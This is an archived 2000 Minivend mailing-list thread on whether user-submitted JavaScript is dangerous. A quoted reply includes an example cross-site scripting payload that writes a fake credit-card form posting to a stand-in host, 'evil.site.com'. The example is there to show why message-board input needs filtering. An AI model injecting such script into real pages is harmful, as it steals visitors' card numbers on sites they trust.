[Date Prev][Date Next][Thread Prev][Thread Next][Minivend by date
][Minivend by thread
]
Re: [mv] RE: ..about time
****** message to minivend-users from Barry Treahy <treahy@mmaz.com> ******
This may be a bit short-sighted on my part, but isn't this why we run encrypted sessions with
certificates provided by authenticated CA's? To provide assurances to our customers that
they are connected to who they think they are?
Sure, mock pages for password stealing or CC # abduction is probably common across the net,
but I never put my card into a form that isn't encrypted... Should this be SOP?
Barry Treahy
"kyle@invisio.com" wrote:
> ****** message to minivend-users from "kyle@invisio.com" <kyle@invisio.com> ******
>
> It is not really about doing something malicious to a visitors
> computer (like a virus) , it is more like this:
>
> a web site takes form info from a visitor and displays it on a web
> page for others to see (like a message bord) and someone enters
> the code below in the text box:
>
> <script language="JavaScript">
> <!--
> document.write('<form action="https://evil.site.com/cgi/ripoff.pl";
> method="post">');
> document.write('To purchase, please enter your credit card number
> below.<br>');
> document.write('<input type="TEXT" name="cc" value="">');
> document.write('<input type="SUBMIT" name="SUBMIT" value="SUBMIT">');
> document.write('</form>');
> // -->
> </script>
>
> Obviously they could dress it up and make it look like an official form on
> that site if that site did not filter for such content
>
> Then someone stumbles on this form on a site they trust and what do you know,
> but evil.site.com now has their cc number.
>
> This is just one example, just think of the possibilites!
>
> Kyle (KC)
>
> At 02:07 PM 2/3/00 -0600, you wrote:
> >****** message to minivend-users from "Nick Pleis" <npleis@cei.net>
> >******
> >
> >I'm a bit confused...How malicious can you really be with Javascript?
> >
> >I mean...sure you can change the appereance and what not, but can you do
> >any serious <<damage>> or is this more of a threat to just presentation?
> >
> >
> >>
> >> I am certainly not advocating closing down the web; that would make me
> >> have to go back and work for a living. 8-)
> >>
> >> --
> >> Mike Heins http://www.minivend.com/ ___
> >> Internet Robotics |_ _|____
> >> In character, in manners, in 131 Willow Lane, Floor 2 | || _ \
> >> style, in all things, the Oxford, OH 45056 | || |_) |
> >> supreme excellence is <mikeh@minivend.com> |___| _ <
> >> simplicity. -- Longfellow 513.523.7621 FAX 7501 |_| \_\
> >> -
> >> To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
> >> email with 'UNSUBSCRIBE minivend-users' in the body to
> >Majordomo@minivend.com.
> >> Archive of past messages: http://www.minivend.com/minivend/minivend-list
> >>
> >
> >-
> >To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
> >email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
> >Archive of past messages: http://www.minivend.com/minivend/minivend-list
>
> -
> To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
> email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
> Archive of past messages: http://www.minivend.com/minivend/minivend-list
-
To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list
